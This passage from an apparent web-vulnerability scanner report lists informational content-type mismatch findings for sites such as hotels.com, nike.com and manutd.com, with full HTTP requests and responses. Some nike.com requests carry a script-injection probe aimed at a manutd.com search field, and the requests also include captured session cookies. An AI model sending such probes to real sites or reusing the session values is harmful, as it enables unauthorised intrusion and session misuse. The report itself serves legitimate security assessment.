Server: Apache
Date: Mon, 03 Oct 2011 00:38:15 GMT
Age: 2539
Connection: keep-alive
Content-Length: 8

<!-- -->
28.85. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=158327657537972&app_id=158327657537972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0e142%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1614ac084%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd74f8a6%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31b76cd44%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df222c04f5c%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.177.62
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:23 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.86. http://www.getaroom.com/browse/market_deals  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /browse/market_deals

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /browse/market_deals?market_id=10 HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; show_pu=pageview=1&allowed=true&shown=false; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.2.9.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "c52e212f54eec4829ea5658dd625fe7e"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 489
Set-Cookie: show_pu=pageview=1&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--4a29eac522682a877f487f79d32005f0cda149f5; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 8536

this.heading_update[this.deals_cache_index] = '<div id=\"deals_heading\"><h2>Hotel Deals of the Day &#183; <span id=\"updated_deals_heading\">Washington DC<\/span><\/h2><\/div>';

this.deals_cache[thi
...[SNIP]...
28.87. http://www.hotels.com/hoteldetails/urgencypopup.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:28:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:41 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>
28.88. http://www.hotels.com/selectors/en_US/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hotels.com
Path:   /selectors/en_US/

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /selectors/en_US/ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:10 GMT
Content-Length: 36464
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:10 GMT; Path=/
Set-Cookie: user=RCoxMjQuMS4wLmkxOjk3LjczLjEuaTM6OTguNi40OjEzNy4wLjAuaTI6MTQ1LjAuMC5pMjoxMDguMS4wLmkyOjE1Mi4wLjAuaTI6Mi4yLjE6MTk2LjEuMDo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjEuNTAzLjAuaTc6MTM4LjEuMDoxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:10 GMT; Path=/

<headerFooterAdditionalData>
<languageSelectorContent>
<group id="site_group_africa_middle_east">
<![CDATA[
<div class="heading">Africa/Middle East</div>
<ul>

...[SNIP]...
28.89. http://www.hublot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hublot.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; DP_WEBSITE_LANGUAGE=en; Languages=http://www.hublot.com/en/; DP_WEBSITE_24H_STAT=1317599916; DP_WEBSITE_MONTH_STAT=10.11; DP_WEBSITE_VISITOR_STAT_NEW=1317599916

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 22 Apr 2008 08:29:56 GMT
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:04 GMT
Connection: close

..............(...&... ..........N...(....... ...................................................................................................x..p.p.....p.p......p.......p......pp...............
...[SNIP]...
28.90. http://www.inadcoads.com/script.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.inadcoads.com
Path:   /script.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8DAQUCAQQAAAAA9SRHEAAAAAA./cnd=!NwWFKgi5jQkQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D HTTP/1.1
Host: www.inadcoads.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ib.adnxs.com/if?enc=VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8BAgUCAQQAAAAA9CQ0EAAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317599958%29%3Buf%28%27c%27%2C+149177%2C+1317599958%29%3Buf%28%27r%27%2C+652926%2C+1317599958%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3B&cnd=!Dh5vzwi5jQkQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABALkBkJ0uALYV5D_BAZCdLgC2FeQ_yQFmZmZmZmbyP9kBAAAAAAAA8D_gAQA.&ccd=!NwWFKgi5jQkQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET-WS5
P3P: CP="NON DSP COR CURa PSAa PSDa IVAi CONi TELi OUR BUS PHY ONL UNI COM NAV INT DEM"
Date: Mon, 03 Oct 2011 00:00:48 GMT
Content-Length: 1320

iad_rdn = Math.floor(Math.random() * 1E16);iad_maxl = 400;iad_title = '';iad_kw = '';try{iad_title = (document.title ? document.title.substring(0, iad_maxl): '');var iad_eles = document.getElementsByT
...[SNIP]...
28.91. http://www.manutd.com/styles/greybox/gb_scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manutd.com
Path:   /styles/greybox/gb_scripts.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /styles/greybox/gb_scripts.js?v=87 HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.1.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 01 Dec 2010 16:06:20 GMT
Accept-Ranges: bytes
ETag: "0662cb17191cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
svr: web5
Content-Length: 24432
Cache-Control: max-age=138117
Date: Sun, 02 Oct 2011 23:49:15 GMT
Connection: close

..v.a.r. .G.B._.C.U.R.R.E.N.T.=.n.u.l.l.;.
.G.B._.h.i.d.e.=.f.u.n.c.t.i.o.n.(.c.b.).{.
.G.B._.C.U.R.R.E.N.T...h.i.d.e.(.c.b.).;.
.}.;.
.G.r.e.y.B.o.x.=.n.e.w. .A.J.S...C.l.a.s.s.(.{.i.n.i.t.:.f.u.n.c.
...[SNIP]...
28.92. http://www.nike.com/nikefootball/global/xml/style.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikefootball/global/xml/style.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /nikefootball/global/xml/style.xml HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/global/modules/nav/v1/swf/nav-module-menu-1-2.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1317599910141; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/xml
RequestStartSec: 1244081979
RequestStartUsec: 115421
P3P: policyref=http://www.nike.com/w3c/p3p.xml
AnalysisUserId: 104261244081972
Last-Modified: Tue, 11 Nov 2008 13:20:17 GMT
ETag: "8f-49198691"
Vary: Accept-Encoding
Content-Length: 143
Cache-Control: max-age=4344
Expires: Mon, 03 Oct 2011 01:15:13 GMT
Date: Mon, 03 Oct 2011 00:02:49 GMT
Connection: close

<div id="nikeos_style" theme="dark">
   <div id="accent_color" flat="0xFF6600" gradient_top="0xF26100" gradient_bottom="0xBC4B00"></div>
</div>
28.93. http://www.nike.com/nikefootball/home/socialfeeds  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikefootball/home/socialfeeds

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /nikefootball/home/socialfeeds?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 2479
Cache-Control: max-age=2641
Expires: Mon, 03 Oct 2011 00:46:46 GMT
Date: Mon, 03 Oct 2011 00:02:45 GMT
Connection: close

           
                                                                                                                               <li class="hero" data-url="http://inside.nike.com/blogs/nikesoccer/feeds/posts">
                       <a href="http://inside.nike.com/blogs/nikesoccer/2011/09/19/m
...[SNIP]...
28.94. http://www.nike.com/nikefootball/home/twitterfeed  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikefootball/home/twitterfeed

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /nikefootball/home/twitterfeed?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 846
Cache-Control: max-age=58
Expires: Mon, 03 Oct 2011 00:03:44 GMT
Date: Mon, 03 Oct 2011 00:02:46 GMT
Connection: close

           
                                                                                                                                                                                                                                                   <li data-url="http://twitter.com/statuses/user_timeline/10678292.rss">
                           
                           <a href="http://tw
...[SNIP]...
28.95. http://www.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nike.com
Path:   /nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
